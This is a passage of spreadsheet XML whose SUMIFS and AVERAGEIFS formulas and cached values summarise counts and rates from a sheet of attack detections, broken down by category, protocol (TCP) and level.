        <f>SUMIFS('(B) - Detecciones - Ataques'!$R$3:$R$139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$E$3:$E$139,BI27)</f>
        <v>1</v>
      </c>
      <c r="BJ31" s="355">
        <f>SUMIFS('(B) - Detecciones - Ataques'!$R$3:$R$139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$E$3:$E$139,BJ27)</f>
        <v>1</v>
      </c>
      <c r="BK31" s="355">
        <f>SUMIFS('(B) - Detecciones - Ataques'!$R$3:$R$139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$E$3:$E$139,BK27)</f>
        <v>3</v>
      </c>
      <c r="BL31" s="355">
        <f>SUMIFS('(B) - Detecciones - Ataques'!$R$3:$R$139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$E$3:$E$139,BL27)</f>
        <v>1</v>
      </c>
      <c r="BM31" s="355">
        <f>SUMIFS('(B) - Detecciones - Ataques'!$R$3:$R$139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$E$3:$E$139,BM27)</f>
        <v>3292</v>
      </c>
      <c r="BN31" s="355">
        <f>SUMIFS('(B) - Detecciones - Ataques'!$R$3:$R$139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$E$3:$E$139,BN27)</f>
        <v>5180</v>
      </c>
      <c r="BO31" s="355">
        <f>SUMIFS('(B) - Detecciones - Ataques'!$R$3:$R$139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$E$3:$E$139,BO27)</f>
        <v>0</v>
      </c>
      <c r="BP31" s="355">
        <f>SUMIFS('(B) - Detecciones - Ataques'!$R$3:$R$139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$E$3:$E$139,BP27)</f>
        <v>0</v>
      </c>
      <c r="BQ31" s="355">
        <f>SUMIFS('(B) - Detecciones - Ataques'!$R$3:$R$139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$E$3:$E$139,BQ27)</f>
        <v>204</v>
      </c>
      <c r="BR31" s="355">
        <f>SUMIFS('(B) - Detecciones - Ataques'!$R$3:$R$139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$E$3:$E$139,BR27)</f>
        <v>0</v>
      </c>
      <c r="BS31" s="355">
        <f>SUMIFS('(B) - Detecciones - Ataques'!$R$3:$R$139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$E$3:$E$139,BS27)</f>
        <v>2</v>
      </c>
      <c r="BT31" s="355">
        <f>SUMIFS('(B) - Detecciones - Ataques'!$R$3:$R$139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$E$3:$E$139,BT27)</f>
        <v>1</v>
      </c>
      <c r="BU31" s="355">
        <f>SUMIFS('(B) - Detecciones - Ataques'!$R$3:$R$139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$E$3:$E$139,BU27)</f>
        <v>0</v>
      </c>
      <c r="BV31" s="355">
        <f>SUMIFS('(B) - Detecciones - Ataques'!$R$3:$R$139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$E$3:$E$139,BV27)</f>
        <v>1</v>
      </c>
      <c r="BW31" s="355">
        <f>SUMIFS('(B) - Detecciones - Ataques'!$R$3:$R$139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$E$3:$E$139,BW27)</f>
        <v>1</v>
      </c>
      <c r="BX31" s="355">
        <f>SUMIFS('(B) - Detecciones - Ataques'!$R$3:$R$139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$E$3:$E$139,BX27)</f>
        <v>0</v>
      </c>
      <c r="BY31" s="355">
        <f>SUMIFS('(B) - Detecciones - Ataques'!$R$3:$R$139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$E$3:$E$139,BY27)</f>
        <v>9</v>
      </c>
      <c r="BZ31" s="355">
        <f>SUMIFS('(B) - Detecciones - Ataques'!$R$3:$R$139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$E$3:$E$139,BZ27)</f>
        <v>123</v>
      </c>
      <c r="CA31" s="355">
        <f>SUMIFS('(B) - Detecciones - Ataques'!$R$3:$R$139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$E$3:$E$139,CA27)</f>
        <v>0</v>
      </c>
      <c r="CB31" s="355">
        <f>SUMIFS('(B) - Detecciones - Ataques'!$R$3:$R$139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$E$3:$E$139,CB27)</f>
        <v>1</v>
      </c>
      <c r="CC31" s="355">
        <f>SUMIFS('(B) - Detecciones - Ataques'!$R$3:$R$139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$E$3:$E$139,CC27)</f>
        <v>1</v>
      </c>
      <c r="CD31" s="355">
        <f>SUMIFS('(B) - Detecciones - Ataques'!$R$3:$R$139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$E$3:$E$139,CD27)</f>
        <v>1</v>
      </c>
      <c r="CE31" s="355">
        <f>SUMIFS('(B) - Detecciones - Ataques'!$R$3:$R$139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$E$3:$E$139,CE27)</f>
        <v>0</v>
      </c>
      <c r="CF31" s="355">
        <f>SUMIFS('(B) - Detecciones - Ataques'!$R$3:$R$139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$E$3:$E$139,CF27)</f>
        <v>1</v>
      </c>
      <c r="CG31" s="355">
        <f>SUMIFS('(B) - Detecciones - Ataques'!$R$3:$R$139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$E$3:$E$139,CG27)</f>
        <v>1</v>
      </c>
      <c r="CH31" s="355">
        <f>SUMIFS('(B) - Detecciones - Ataques'!$R$3:$R$139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$E$3:$E$139,CH27)</f>
        <v>1</v>
      </c>
      <c r="CI31" s="355">
        <f>SUMIFS('(B) - Detecciones - Ataques'!$R$3:$R$139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$E$3:$E$139,CI27)</f>
        <v>1</v>
      </c>
      <c r="CJ31" s="355">
        <f>SUMIFS('(B) - Detecciones - Ataques'!$R$3:$R$139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$E$3:$E$139,CJ27)</f>
        <v>1</v>
      </c>
      <c r="CK31" s="355">
        <f>SUMIFS('(B) - Detecciones - Ataques'!$R$3:$R$139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$E$3:$E$139,CK27)</f>
        <v>1</v>
      </c>
      <c r="CL31" s="355">
        <f>SUMIFS('(B) - Detecciones - Ataques'!$R$3:$R$139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$E$3:$E$139,CL27)</f>
        <v>0</v>
      </c>
      <c r="CM31" s="355">
        <f>SUMIFS('(B) - Detecciones - Ataques'!$R$3:$R$139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$E$3:$E$139,CM27)</f>
        <v>2</v>
      </c>
      <c r="CN31" s="355">
        <f>SUMIFS('(B) - Detecciones - Ataques'!$R$3:$R$139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$E$3:$E$139,CN27)</f>
        <v>1</v>
      </c>
      <c r="CO31" s="355">
        <f>SUMIFS('(B) - Detecciones - Ataques'!$R$3:$R$139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$E$3:$E$139,CO27)</f>
        <v>6</v>
      </c>
      <c r="CP31" s="355">
        <f>SUMIFS('(B) - Detecciones - Ataques'!$R$3:$R$139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$E$3:$E$139,CP27)</f>
        <v>2</v>
      </c>
      <c r="CQ31" s="355">
        <f>SUMIFS('(B) - Detecciones - Ataques'!$R$3:$R$139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$E$3:$E$139,CQ27)</f>
        <v>1</v>
      </c>
      <c r="CR31" s="355">
        <f>SUMIFS('(B) - Detecciones - Ataques'!$R$3:$R$139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$E$3:$E$139,CR27)</f>
        <v>0</v>
      </c>
      <c r="CS31" s="355">
        <f>SUMIFS('(B) - Detecciones - Ataques'!$R$3:$R$139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$E$3:$E$139,CS27)</f>
        <v>72030</v>
      </c>
      <c r="CT31" s="355">
        <f>SUMIFS('(B) - Detecciones - Ataques'!$R$3:$R$139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$E$3:$E$139,CT27)</f>
        <v>1002</v>
      </c>
      <c r="CU31" s="355">
        <f>SUMIFS('(B) - Detecciones - Ataques'!$R$3:$R$139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$E$3:$E$139,CU27)</f>
        <v>0</v>
      </c>
      <c r="CV31" s="355">
        <f>SUMIFS('(B) - Detecciones - Ataques'!$R$3:$R$139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$E$3:$E$139,CV27)</f>
        <v>1</v>
      </c>
      <c r="CW31" s="355">
        <f>SUMIFS('(B) - Detecciones - Ataques'!$R$3:$R$139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$E$3:$E$139,CW27)</f>
        <v>0</v>
      </c>
      <c r="CX31" s="355">
        <f>SUMIFS('(B) - Detecciones - Ataques'!$R$3:$R$139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$E$3:$E$139,CX27)</f>
        <v>2</v>
      </c>
      <c r="CY31" s="355">
        <f>SUMIFS('(B) - Detecciones - Ataques'!$R$3:$R$139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$E$3:$E$139,CY27)</f>
        <v>17</v>
      </c>
      <c r="CZ31" s="355">
        <f>SUMIFS('(B) - Detecciones - Ataques'!$R$3:$R$139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$E$3:$E$139,CZ27)</f>
        <v>0</v>
      </c>
      <c r="DA31" s="355">
        <f>SUMIFS('(B) - Detecciones - Ataques'!$R$3:$R$139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$E$3:$E$139,DA27)</f>
        <v>0</v>
      </c>
      <c r="DB31" s="355">
        <f>SUMIFS('(B) - Detecciones - Ataques'!$R$3:$R$139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$E$3:$E$139,DB27)</f>
        <v>0</v>
      </c>
      <c r="DC31" s="355">
        <f>SUMIFS('(B) - Detecciones - Ataques'!$R$3:$R$139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$E$3:$E$139,DC27)</f>
        <v>0</v>
      </c>
      <c r="DD31" s="355">
        <f>SUMIFS('(B) - Detecciones - Ataques'!$R$3:$R$139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$E$3:$E$139,DD27)</f>
        <v>1</v>
      </c>
      <c r="DE31" s="355">
        <f>SUMIFS('(B) - Detecciones - Ataques'!$R$3:$R$139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$E$3:$E$139,DE27)</f>
        <v>5</v>
      </c>
      <c r="DF31" s="355">
        <f>SUMIFS('(B) - Detecciones - Ataques'!$R$3:$R$139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$E$3:$E$139,DF27)</f>
        <v>1</v>
      </c>
      <c r="DG31" s="355">
        <f>SUMIFS('(B) - Detecciones - Ataques'!$R$3:$R$139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$E$3:$E$139,DG27)</f>
        <v>0</v>
      </c>
      <c r="DH31" s="355">
        <f>SUMIFS('(B) - Detecciones - Ataques'!$R$3:$R$139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$E$3:$E$139,DH27)</f>
        <v>450</v>
      </c>
      <c r="DI31" s="355">
        <f>SUMIFS('(B) - Detecciones - Ataques'!$R$3:$R$139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$E$3:$E$139,DI27)</f>
        <v>11053</v>
      </c>
      <c r="DJ31" s="356">
        <f>SUMIFS('(B) - Detecciones - Ataques'!$R$3:$R$139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$E$3:$E$139,DJ27)</f>
        <v>11</v>
      </c>
      <c r="DK31" s="271"/>
      <c r="DO31" s="357"/>
      <c r="DP31" s="358" t="s">
        <v>633</v>
      </c>
      <c r="DQ31" s="359">
        <v>0.0</v>
      </c>
      <c r="DR31" s="359">
        <v>3.0</v>
      </c>
      <c r="DS31" s="359">
        <v>3.0</v>
      </c>
      <c r="DT31" s="359">
        <v>3.0</v>
      </c>
      <c r="DU31" s="360">
        <v>3.0</v>
      </c>
      <c r="DV31" s="271"/>
      <c r="DW31" s="358" t="s">
        <v>633</v>
      </c>
      <c r="DX31" s="359">
        <v>0.0</v>
      </c>
      <c r="DY31" s="359">
        <v>4.0</v>
      </c>
      <c r="DZ31" s="359">
        <v>4.0</v>
      </c>
      <c r="EA31" s="359">
        <v>4.0</v>
      </c>
      <c r="EB31" s="360">
        <v>4.0</v>
      </c>
      <c r="EC31" s="271"/>
      <c r="ED31" s="280"/>
      <c r="EG31" s="279"/>
      <c r="EH31" s="271"/>
      <c r="EI31" s="358" t="s">
        <v>633</v>
      </c>
      <c r="EJ31" s="359">
        <f>SUMIFS('(B) - Detecciones - Ataques'!AL$3:AL$139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$B$3:$B$139,$EI31,'(B) - Detecciones - Ataques'!$GS$3:$GS$139,"✔") + SUMIFS('(B) - Detecciones - Ataques'!AL$3:AL$139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$C$3:$C$139,"*" &amp; $S30 &amp; "*")</f>
        <v>1</v>
      </c>
      <c r="EK31" s="359">
        <f>SUMIFS('(B) - Detecciones - Ataques'!$BX$3:$BX$139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$B$3:$B$139,$EI31,'(B) - Detecciones - Ataques'!$GS$3:$GS$139,"✔") + SUMIFS('(B) - Detecciones - Ataques'!BX$3:BX$139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$C$3:$C$139,"*" &amp; $EI31 &amp; "*")</f>
        <v>13</v>
      </c>
      <c r="EL31" s="359">
        <f>SUMIFS('(B) - Detecciones - Ataques'!DN$3:DN$139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$B$3:$B$139,$EI31,'(B) - Detecciones - Ataques'!$GS$3:$GS$139,"✔") + SUMIFS('(B) - Detecciones - Ataques'!DN$3:DN$139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$C$3:$C$139,"*" &amp; $EI31 &amp; "*")</f>
        <v>21</v>
      </c>
      <c r="EM31" s="359">
        <f>SUMIFS('(B) - Detecciones - Ataques'!FD$3:FD$139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$B$3:$B$139,$EI31,'(B) - Detecciones - Ataques'!$GS$3:$GS$139,"✔") + SUMIFS('(B) - Detecciones - Ataques'!FD$3:FD$139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$C$3:$C$139,"*" &amp; $EI31 &amp; "*")</f>
        <v>42</v>
      </c>
      <c r="EN31" s="360">
        <f t="shared" si="4"/>
        <v>42</v>
      </c>
      <c r="EO31" s="364"/>
      <c r="EP31" s="364"/>
      <c r="EQ31" s="364"/>
      <c r="ER31" s="364"/>
      <c r="ES31" s="364"/>
      <c r="ET31" s="364"/>
      <c r="EU31" s="364"/>
      <c r="EV31" s="379" t="s">
        <v>633</v>
      </c>
      <c r="EW31" s="389">
        <f t="shared" si="8"/>
        <v>0.25</v>
      </c>
      <c r="EX31" s="389">
        <f t="shared" si="9"/>
        <v>3.25</v>
      </c>
      <c r="EY31" s="389">
        <f t="shared" si="10"/>
        <v>5.25</v>
      </c>
      <c r="EZ31" s="390">
        <f t="shared" si="11"/>
        <v>10.5</v>
      </c>
      <c r="FA31" s="367"/>
      <c r="FD31" s="391"/>
      <c r="FK31" s="303" t="s">
        <v>244</v>
      </c>
      <c r="FL31" s="68">
        <f>SUMIFS('(B) - Detecciones - Ataques'!AP$3:AP$139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$B$3:$B$139,$FK31,'(B) - Detecciones - Ataques'!$GS$3:$GS$139,"✔") + SUMIFS('(B) - Detecciones - Ataques'!AP$3:AP$139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$C$3:$C$139,"*" &amp; $FK31 &amp; "*")</f>
        <v>1</v>
      </c>
      <c r="FM31" s="68">
        <f>SUMIFS('(B) - Detecciones - Ataques'!CB$3:CB$139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$B$3:$B$139,$FK31,'(B) - Detecciones - Ataques'!$GS$3:$GS$139,"✔") + SUMIFS('(B) - Detecciones - Ataques'!CB$3:CB$139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$C$3:$C$139,"*" &amp; $FK31 &amp; "*")</f>
        <v>1</v>
      </c>
      <c r="FN31" s="68">
        <f>SUMIFS('(B) - Detecciones - Ataques'!DR$3:DR$139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$B$3:$B$139,$FK31,'(B) - Detecciones - Ataques'!$GS$3:$GS$139,"✔") + SUMIFS('(B) - Detecciones - Ataques'!DR$3:DR$139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$C$3:$C$139,"*" &amp; $FK31 &amp; "*")</f>
        <v>12</v>
      </c>
      <c r="FO31" s="304">
        <f>SUMIFS('(B) - Detecciones - Ataques'!FH$3:FH$139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$B$3:$B$139,$FK31,'(B) - Detecciones - Ataques'!$GS$3:$GS$139,"✔") + SUMIFS('(B) - Detecciones - Ataques'!FH$3:FH$139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$C$3:$C$139,"*" &amp; $FK31 &amp; "*")</f>
        <v>13</v>
      </c>
      <c r="FQ31" s="303" t="s">
        <v>244</v>
      </c>
      <c r="FR31" s="69">
        <f t="shared" ref="FR31:FU31" si="12">1-(FL31/EJ33)</f>
        <v>0</v>
      </c>
      <c r="FS31" s="69">
        <f t="shared" si="12"/>
        <v>0.6666666667</v>
      </c>
      <c r="FT31" s="69">
        <f t="shared" si="12"/>
        <v>0.1428571429</v>
      </c>
      <c r="FU31" s="306">
        <f t="shared" si="12"/>
        <v>0.5806451613</v>
      </c>
      <c r="FV31" s="392"/>
      <c r="FW31" s="392"/>
      <c r="FX31" s="392"/>
      <c r="FY31" s="393" t="s">
        <v>9</v>
      </c>
      <c r="FZ31" s="394">
        <f>AVERAGEIF('(B) - Detecciones - Ataques'!IS3:IS139,"✔",'(B) - Detecciones - Ataques'!GQ3:GQ139)</f>
        <v>0.4277893364</v>
      </c>
      <c r="GA31" s="394">
        <f>AVERAGEIF('(B) - Detecciones - Ataques'!IS3:IS139,"✔",'(B) - Detecciones - Ataques'!GR3:GR139)</f>
        <v>0.5</v>
      </c>
      <c r="GB31" s="392"/>
      <c r="GC31" s="392"/>
      <c r="GD31" s="392"/>
      <c r="GE31" s="392"/>
      <c r="GF31" s="392"/>
      <c r="GG31" s="395" t="str">
        <f>IFERROR(__xludf.DUMMYFUNCTION("""COMPUTED_VALUE"""),"TCP")</f>
        <v>TCP</v>
      </c>
      <c r="GH31" s="368">
        <f>AVERAGEIFS('(B) - Detecciones - Ataques'!$GJ$3:$GJ$139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$L$3:$L$139,GG31)</f>
        <v>0.4783451313</v>
      </c>
      <c r="GI31" s="336">
        <f>AVERAGEIFS('(B) - Detecciones - Ataques'!$GQ$3:$GQ$139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$L$3:$L$139,GG31)</f>
        <v>0.4404663434</v>
      </c>
      <c r="GJ31" s="373">
        <f>AVERAGEIFS('(B) - Detecciones - Ataques'!$GR$3:$GR$139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$L$3:$L$139,GG31)</f>
        <v>0.6111111111</v>
      </c>
      <c r="GK31" s="395" t="str">
        <f>IFERROR(__xludf.DUMMYFUNCTION("""COMPUTED_VALUE"""),"TCP")</f>
        <v>TCP</v>
      </c>
      <c r="GL31" s="368">
        <f>AVERAGEIFS('(B) - Detecciones - Ataques'!$ET$3:$ET$139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$L$3:$L$139,GG31)</f>
        <v>0.4227895758</v>
      </c>
      <c r="GM31" s="336">
        <f>AVERAGEIFS('(B) - Detecciones - Ataques'!$FA$3:$FA$139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$L$3:$L$139,GG31)</f>
        <v>0.3899612929</v>
      </c>
      <c r="GN31" s="374">
        <f>AVERAGEIFS('(B) - Detecciones - Ataques'!$FB$3:$FB$139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$L$3:$L$139,GG31)</f>
        <v>0.5555555556</v>
      </c>
      <c r="GO31" s="395" t="str">
        <f>IFERROR(__xludf.DUMMYFUNCTION("""COMPUTED_VALUE"""),"TCP")</f>
        <v>TCP</v>
      </c>
      <c r="GP31" s="368">
        <f>AVERAGEIFS('(B) - Detecciones - Ataques'!$DD$3:$DD$139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$L$3:$L$139,GG31)</f>
        <v>0.3116784647</v>
      </c>
      <c r="GQ31" s="336">
        <f>AVERAGEIFS('(B) - Detecciones - Ataques'!$DK$3:$DK$139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$L$3:$L$139,GG31)</f>
        <v>0.2737996768</v>
      </c>
      <c r="GR31" s="374">
        <f>AVERAGEIFS('(B) - Detecciones - Ataques'!$DL$3:$DL$139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$L$3:$L$139,GG31)</f>
        <v>0.4444444444</v>
      </c>
      <c r="GS31" s="395" t="str">
        <f>IFERROR(__xludf.DUMMYFUNCTION("""COMPUTED_VALUE"""),"TCP")</f>
        <v>TCP</v>
      </c>
      <c r="GT31" s="368">
        <f>AVERAGEIFS('(B) - Detecciones - Ataques'!$BN$3:$BN$139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$L$3:$L$139,GG31)</f>
        <v>0.0885270775</v>
      </c>
      <c r="GU31" s="336">
        <f>AVERAGEIFS('(B) - Detecciones - Ataques'!$BU$3:$BU$139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$L$3:$L$139,GG31)</f>
        <v>0.0885270775</v>
      </c>
      <c r="GV31" s="374">
        <f>AVERAGEIFS('(B) - Detecciones - Ataques'!$BV$3:$BV$139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$L$3:$L$139,GG31)</f>
        <v>0.1111111111</v>
      </c>
      <c r="GW31" s="392"/>
      <c r="GX31" s="392"/>
      <c r="GY31" s="392"/>
      <c r="GZ31" s="392"/>
      <c r="HA31" s="392"/>
      <c r="HB31" s="392"/>
      <c r="HC31" s="393" t="s">
        <v>9</v>
      </c>
      <c r="HD31" s="396">
        <f>AVERAGEIFS('(B) - Detecciones - Ataques'!GQ3:GQ139,'(B) - Detecciones - Ataques'!IS3:IS139,"✔",'(B) - Detecciones - Ataques'!AG3:AG139,"LV1")</f>
        <v>0.4835250382</v>
      </c>
      <c r="HE31" s="397">
        <f>AVERAGEIFS('(B) - Detecciones - Ataques'!GR3:GR139,'(B) - Detecciones - Ataques'!IS3:IS139,"✔",'(B) - Detecciones - Ataques'!AG3:AG139,"LV1")</f>
        <v>0.5636363636</v>
      </c>
      <c r="HF31" s="394">
        <f>AVERAGEIFS('(B) - Detecciones - Ataques'!GQ3:GQ139,'(B) - Detecciones - Ataques'!IS3:IS139,"✔",'(B) - Detecciones - Ataques'!AG3:AG139,"LV2")</f>
        <v>0.3142536476</v>
      </c>
      <c r="HG31" s="394">
        <f>AVERAGEIFS('(B) - Detecciones - Ataques'!GR3:GR139,'(B) - Detecciones - Ataques'!IS3:IS139,"✔",'(B) - Detecciones - Ataques'!AG3:AG139,"LV2")</f>
        <v>0.3703703704</v>
      </c>
      <c r="HH31" s="392"/>
      <c r="HI31" s="392"/>
      <c r="HJ31" s="392"/>
      <c r="HK31" s="392"/>
      <c r="HL31" s="392"/>
      <c r="HM31" s="392"/>
      <c r="HN31" s="392"/>
      <c r="HO31" s="392"/>
      <c r="HP31" s="392"/>
    </row>
    <row r="32">
      <c r="B32" s="277"/>
      <c r="C32" s="271"/>
      <c r="D32" s="271"/>
      <c r="E32" s="271"/>
      <c r="F32" s="271"/>
      <c r="G32" s="278"/>
      <c r="J32" s="277"/>
      <c r="K32" s="376"/>
      <c r="L32" s="377"/>
      <c r="M32" s="377"/>
      <c r="N32" s="378"/>
      <c r="O32" s="278"/>
      <c r="Q32" s="271"/>
      <c r="R32" s="352" t="s">
        <v>2472</v>
      </c>
      <c r="S32" s="353">
        <f>S28-(SUMIFS('(B) - Detecciones - Ataques'!$M3:$M139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$B$3:$B$139,S27,'(B) - Detecciones - Ataques'!$GJ$3:$GJ$139,"-") + SUMIFS('(B) - Detecciones - Ataques'!$M3:$M139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$C$3:$C$139,"*" &amp; S27 &amp; "*",'(B) - Detecciones - Ataques'!$GJ$3:$GJ$139,"-"))</f>
        <v>2125</v>
      </c>
      <c r="T32" s="353">
        <f>T28-(SUMIFS('(B) - Detecciones - Ataques'!$M3:$M139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$B$3:$B$139,T27,'(B) - Detecciones - Ataques'!$GJ$3:$GJ$139,"-") + SUMIFS('(B) - Detecciones - Ataques'!$M3:$M139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$C$3:$C$139,"*" &amp; T27 &amp; "*",'(B) - Detecciones - Ataques'!$GJ$3:$GJ$139,"-"))</f>
        <v>0</v>
      </c>
      <c r="U32" s="353">
